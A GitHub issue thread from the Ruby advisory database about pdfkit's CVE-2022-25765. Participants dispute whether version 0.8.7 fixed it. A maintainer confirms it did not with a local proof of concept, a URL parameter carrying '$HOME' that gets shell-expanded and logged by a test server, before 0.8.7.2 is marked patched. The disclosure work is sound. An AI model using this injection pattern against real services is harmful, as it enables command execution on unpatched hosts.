ruby-advisory-db icon indicating copy to clipboard operation
ruby-advisory-db copied to clipboard

Published 20 hours ago verified publisher icon rubysec

CVE 2022-25765 was fixed

Open BigG1947 opened this issue 3 years ago • 2 comments

Hi, it's look like CVE-2022-25765 was fixed in 0.8.7v. Can i create pr with patched CVE-2022-25765.yml?

BigG1947 avatar Oct 06 '22 08:10 BigG1947

It's not fixed. @postmodern Please mark vulnerable version v0.8.7

https://github.com/pdfkit/pdfkit/issues/517

MuhammetDilmac avatar Oct 08 '22 08:10 MuhammetDilmac

Had to confirm locally:

source 'https://rubygems.org/'

# `dnf install wkhtmltopdf` / `apt install wkhtmltopdf`
gem 'pdfkit', '~> 0.8.7'
gem 'webrick'
gem 'sinatra'

require 'bundler/setup'
require 'pdfkit'
PDFKit.new("http://localhost:3000/?home=$HOME").to_pdf

require 'bundler/setup'
require 'sinatra/base'

class App < Sinatra::Base

  get '/' do
    puts "Received HOME: #{params['home']}"

    halt 200, "Got your HOME lol"
  end

end

App.run!(host: 'localhost', port: 3000)

In terminal 1:

$ ruby test.rb

In terminal 2:

$ ruby app.rb 
[2022-10-08 01:36:48] INFO  WEBrick 1.7.0
[2022-10-08 01:36:48] INFO  ruby 3.1.2 (2022-04-12) [x86_64-linux]
== Sinatra (v3.0.1) has taken the stage on 3000 for development with backup from WEBrick
[2022-10-08 01:36:48] INFO  WEBrick::HTTPServer#start: pid=35616 port=3000
Received HOME: /home/postmodern
::1 - - [08/Oct/2022:01:36:51 PDT] "GET /?home=/home/postmodern HTTP/1.1" 200 17
- -> /?home=/home/postmodern

postmodern avatar Oct 08 '22 08:10 postmodern

Now waiting for the maintainer to review https://github.com/pdfkit/pdfkit/pull/519

postmodern avatar Oct 11 '22 05:10 postmodern

Looks like the good pdfkit folks just released 0.8.7.2 that included the fix for this CVE

rustygeldmacher avatar Oct 18 '22 19:10 rustygeldmacher

Marked >= 0.8.7.2 as patched.

postmodern avatar Oct 18 '22 20:10 postmodern